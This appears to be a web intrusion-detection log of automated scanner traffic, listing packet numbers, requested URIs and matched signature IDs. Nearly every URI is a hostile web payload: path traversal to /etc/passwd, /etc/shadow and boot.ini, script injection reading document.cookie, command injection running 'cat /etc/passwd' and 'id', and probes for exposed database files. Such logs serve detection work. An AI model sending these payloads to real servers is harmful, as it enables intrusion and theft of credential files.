Packet [1243]	Uri [/cgi-bin/snorkerz.bat]	Nattacks [1]	Signatures	[300001562]
Packet [1245]	Uri [/cgi-bin/snoSensePostNotThereNoNo.bat]	Nattacks [1]	Signatures	[300001562]
Packet [1249]	Uri [/cgi-bin/webdist.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1250]	Uri [/cgi-bin/webSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1253]	Uri [/cgi-dos/args.bat]	Nattacks [1]	Signatures	[300001562]
Packet [1254]	Uri [/cgi-dos/argSensePostNotThereNoNo.bat]	Nattacks [1]	Signatures	[300001562]
Packet [1257]	Uri [/cgi-shl/win-c-sample.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1258]	Uri [/cgi-shl/winSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1259]	Uri [/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1260]	Uri [/cgi-sys/addalink.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1261]	Uri [/cgi-sys/addSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1268]	Uri [/cgi-sys/domainredirect.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1269]	Uri [/cgi-sys/domSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1270]	Uri [/cgi-sys/entropybanner.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1271]	Uri [/cgi-sys/entropysearch.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1272]	Uri [/cgi-sys/entSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1273]	Uri [/cgi-sys/FormMail-clone.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1274]	Uri [/cgi-sys/ForSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1275]	Uri [/cgi-sys/helpdesk.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1276]	Uri [/cgi-sys/helSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1277]	Uri [/cgi-sys/mchat.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1278]	Uri [/cgi-sys/mchSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1279]	Uri [/cgi-sys/randhtml.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1280]	Uri [/cgi-sys/ranSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1281]	Uri [/cgi-sys/realhelpdesk.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1282]	Uri [/cgi-sys/realsignup.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1283]	Uri [/cgi-sys/reaSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1286]	Uri [/cgi-sys/signup.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1287]	Uri [/cgi-sys/sigSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1288]	Uri [/cgi-win/cgiSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1289]	Uri [/cgi-win/cgitest.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1290]	Uri [/cgi-win/uploader.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1291]	Uri [/cgi-win/uplSensePostNotThereNoNo.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1292]	Uri [/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini]	Nattacks [1]	Signatures	[300001516]
Packet [1293]	Uri [/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini]	Nattacks [1]	Signatures	[300001516]
Packet [1296]	Uri [/cgis/wwwboard/wwwboard.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1297]	Uri [/cgis/wwwboard/wwwboard.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1298]	Uri [/cgis/wwwboard/wwwSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1299]	Uri [/cgis/wwwboard/wwwSensePostNotThereNoNod.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1320]	Uri [/clusterframe.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1345]	Uri [/config.inc]	Nattacks [2]	Signatures	[300001517]	[300002829]
Packet [1358]	Uri [/content/base/build/explorer/none.php?/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [1367]	Uri [/cp/rac/nsManager.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1368]	Uri [/cp/rac/nsMSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1371]	Uri [/cplogfile.log]	Nattacks [1]	Signatures	[300001518]
Packet [1375]	Uri [/CSNews.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1376]	Uri [/csPassword.cgi?command=remove%20]	Nattacks [1]	Signatures	[300001513]
Packet [1380]	Uri [/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1381]	Uri [/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1395]	Uri [/dan_o.dat]	Nattacks [1]	Signatures	[300001562]
Packet [1397]	Uri [/data.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1407]	Uri [/database/db2000.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [1408]	Uri [/database/db2SensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [1409]	Uri [/database/metacart.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [1411]	Uri [/database/metSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [1414]	Uri [/databse.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1419]	Uri [/db.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1421]	Uri [/db/users.dat]	Nattacks [1]	Signatures	[300001562]
Packet [1422]	Uri [/db/useSensePostNotThereNoNo.dat]	Nattacks [1]	Signatures	[300001562]
Packet [1430]	Uri [/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	Nattacks [6]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001513]	[300001559]
Packet [1449]	Uri [/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=../../../../../../../../../win.ini&CiRestriction=none&CiHiliteType=Full]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1451]	Uri [/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [7]	Signatures	[300000051]	[300000508]	[300000515]	[300000537]	[300000549]	[300000550]	[300002841]
Packet [1452]	Uri [/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [7]	Signatures	[300000051]	[300000508]	[300000515]	[300000537]	[300000549]	[300000550]	[300002841]
Packet [1456]	Uri [/demo/sql/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1459]	Uri [/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1464]	Uri [/directory.php?dir=%3Bcat%20/etc/passwd]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [1507]	Uri [/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini]	Nattacks [1]	Signatures	[300001516]
Packet [1511]	Uri [/DomainFiles/*//../../../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000039]	[300000040]	[300000057]	[300000067]	[300001559]
Packet [1537]	Uri [/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001513]	[300001559]
Packet [1543]	Uri [/emumail.cgi?type=.%00]	Nattacks [2]	Signatures	[300001359]	[300001513]
Packet [1548]	Uri [/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [1549]	Uri [/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [1555]	Uri [/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [1556]	Uri [/etc/shadow+]	Nattacks [1]	Signatures	[300001559]
Packet [1559]	Uri [/eventcal2.php.php]	Nattacks [1]	Signatures	[300001512]
Packet [1563]	Uri [/ews/ews/architext_query.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1564]	Uri [/ews/ews/arcSensePostNotThereNoNoy.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1579]	Uri [/examples/jsp/snp/snoop.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1580]	Uri [/examples/jsp/source.jsp??]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [1598]	Uri [/exchange/lib/logon.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1607]	Uri [/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C]	Nattacks [1]	Signatures	[300001562]
Packet [1608]	Uri [/ext.ini.%00.txt]	Nattacks [1]	Signatures	[300001359]
Packet [1610]	Uri [/ez2000/ezadmin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1611]	Uri [/ez2000/ezaSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1612]	Uri [/ez2000/ezboard.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1613]	Uri [/ez2000/ezbSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1614]	Uri [/ez2000/ezman.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1615]	Uri [/ez2000/ezmSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1616]	Uri [/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1622]	Uri [/file/../../../../../../../../etc/]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1623]	Uri [/file/../../../../../../../../etcSensePostNotThereNoNoetc/]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1641]	Uri [/foro/YaBB.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1642]	Uri [/foro/YaBSensePostNotThereNoNoB.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1643]	Uri [/forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1644]	Uri [/forum-ra.asp?n=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1645]	Uri [/forum-ra.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1646]	Uri [/forum-ra.asp?n=/../../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1647]	Uri [/forum-ra.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [2]	Signatures	[300000057]	[300001145]
Packet [1648]	Uri [/forum-ra.asp?n=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1649]	Uri [/forum-ra.asp?n=/etc/passwd%00]	Nattacks [3]	Signatures	[300001359]	[300001559]	[300002734]
Packet [1651]	Uri [/forum-ra_professionnel.asp?n=%60/etc/passwd%60]	Nattacks [1]	Signatures	[300001559]
Packet [1652]	Uri [/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1653]	Uri [/forum-ra_professionnel.asp?n=../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1654]	Uri [/forum-ra_professionnel.asp?n=/....../boot.ini]	Nattacks [1]	Signatures	[300000067]
Packet [1655]	Uri [/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1656]	Uri [/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1657]	Uri [/forum-ra_professionnel.asp?n=/../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1658]	Uri [/forum-ra_professionnel.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [2]	Signatures	[300000057]	[300001145]
Packet [1659]	Uri [/forum-ra_professionnel.asp?n=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1660]	Uri [/forum-ra_professionnel.asp?n=/etc/passwd%00]	Nattacks [3]	Signatures	[300001359]	[300001559]	[300002734]
Packet [1663]	Uri [/forum/admin/database/wwForum.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [1664]	Uri [/forum/admin/database/wwFSensePostNotThereNoNo.mdb]	Nattacks [2]	Signatures	[300001034]	[300001526]
Packet [1665]	Uri [/forum/admin/wwforum.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [1666]	Uri [/forum/admin/wwfSensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [1677]	Uri [/forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [1678]	Uri [/forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300000067]
Packet [1679]	Uri [/forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1680]	Uri [/forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]
Packet [1681]	Uri [/forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2]	Signatures	[300000051]	[300000067]
Packet [1682]	Uri [/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]
Packet [1683]	Uri [/forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1684]	Uri [/forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1685]	Uri [/forum1.asp?n=/.\./.\./.\./.\./.\./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300001145]
Packet [1686]	Uri [/forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4]	Signatures	[300000051]	[300001359]	[300001559]	[300002734]
Packet [1687]	Uri [/forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [3]	Signatures	[300000051]	[300001559]	[300002734]
Packet [1688]	Uri [/forum1.asp?n=1753&amp;nn=%60/etc/passwd%60]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [1689]	Uri [/forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300000067]
Packet [1690]	Uri [/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1691]	Uri [/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00]	Nattacks [6]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1692]	Uri [/forum1.asp?n=1753&amp;nn=/....../boot.ini]	Nattacks [2]	Signatures	[300000051]	[300000067]
Packet [1693]	Uri [/forum1.asp?n=1753&amp;nn=/..../boot.ini]	Nattacks [2]	Signatures	[300000051]	[300000067]
Packet [1694]	Uri [/forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]
Packet [1695]	Uri [/forum1.asp?n=1753&amp;nn=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300001145]
Packet [1696]	Uri [/forum1.asp?n=1753&amp;nn=/etc/passwd]	Nattacks [3]	Signatures	[300000051]	[300001559]	[300002734]
Packet [1697]	Uri [/forum1.asp?n=1753&amp;nn=/etc/passwd%00]	Nattacks [4]	Signatures	[300000051]	[300001359]	[300001559]	[300002734]
Packet [1700]	Uri [/forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [1701]	Uri [/forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300000067]
Packet [1702]	Uri [/forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1703]	Uri [/forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2]	Signatures	[300000051]	[300000067]
Packet [1704]	Uri [/forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300000067]
Packet [1705]	Uri [/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]
Packet [1706]	Uri [/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1707]	Uri [/forum1_professionnel.asp?n=/.\./.\./.\./.\./.\./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300001145]
Packet [1708]	Uri [/forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4]	Signatures	[300000051]	[300001359]	[300001559]	[300002734]
Packet [1709]	Uri [/forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [3]	Signatures	[300000051]	[300001559]	[300002734]
Packet [1710]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [1711]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300000067]
Packet [1712]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1]	Nattacks [6]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1713]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1]	Nattacks [2]	Signatures	[300000051]	[300000067]
Packet [1714]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]
Packet [1715]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1]	Nattacks [5]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1716]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/.\./.\./.\./.\./.\./boot.ini&amp;page=1]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300001145]
Packet [1717]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1]	Nattacks [4]	Signatures	[300000051]	[300001359]	[300001559]	[300002734]
Packet [1718]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1]	Nattacks [3]	Signatures	[300000051]	[300001559]	[300002734]
Packet [1719]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [1720]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300000067]
Packet [1721]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00]	Nattacks [6]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1722]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini]	Nattacks [2]	Signatures	[300000051]	[300000067]
Packet [1723]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini]	Nattacks [2]	Signatures	[300000051]	[300000067]
Packet [1724]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300000067]
Packet [1725]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [4]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]
Packet [1726]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000051]	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1727]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [3]	Signatures	[300000051]	[300000057]	[300001145]
Packet [1728]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd]	Nattacks [3]	Signatures	[300000051]	[300001559]	[300002734]
Packet [1729]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00]	Nattacks [4]	Signatures	[300000051]	[300001359]	[300001559]	[300002734]
Packet [1733]	Uri [/forumdisplay.php?GLOBALS[]=1&f=2&comma=\.system('id').\]	Nattacks [2]	Signatures	[300000052]	[300001026]
Packet [1737]	Uri [/forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [3]	Signatures	[300000051]	[300000508]	[300000550]
Packet [1738]	Uri [/forums/indSensePostNotThereNoNo.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [3]	Signatures	[300000051]	[300000508]	[300000550]
Packet [1739]	Uri [/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [1740]	Uri [/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [1742]	Uri [/forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22]	Nattacks [3]	Signatures	[300000051]	[300000052]	[300000508]
Packet [1747]	Uri [/fpdb/shop.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [1748]	Uri [/fpdb/shoSensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [1750]	Uri [/functions.inc.php+]	Nattacks [1]	Signatures	[300001512]
Packet [1760]	Uri [/get_od_toc.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1763]	Uri [/global.inc]	Nattacks [1]	Signatures	[300001517]
Packet [1767]	Uri [/globals.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1769]	Uri [/Gozila.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1775]	Uri [/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [5]	Signatures	[300000051]	[300000508]	[300000515]	[300000537]	[300000550]
Packet [1777]	Uri [/guestbook/admin/o12guest.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [1778]	Uri [/guestbook/admin/o12SensePostNotThereNoNo.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [1785]	Uri [/guestbook/SensePostNotThereNoNo?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [5]	Signatures	[300000051]	[300000508]	[300000515]	[300000537]	[300000550]
Packet [1830]	Uri [/hints.pl?|id|]	Nattacks [1]	Signatures	[300001513]
Packet [1832]	Uri [/hitmatic/analyse.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1833]	Uri [/hitmatic/anaSensePostNotThereNoNo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1836]	Uri [/hola/admin/cms/htmltags.php?datei=./sec/data.php]	Nattacks [1]	Signatures	[300001145]
Packet [1837]	Uri [/hola/admin/cms/htmSensePostNotThereNoNo.php?datei=./sec/data.php]	Nattacks [1]	Signatures	[300001145]
Packet [1840]	Uri [/homebet/homebet.dll?form=menu&amp;option=menu-signin]	Nattacks [2]	Signatures	[300000051]	[300001562]
Packet [1841]	Uri [/homebet/homSensePostNotThereNoNo.dll?form=menu&amp;option=menu-signin]	Nattacks [2]	Signatures	[300000051]	[300001562]
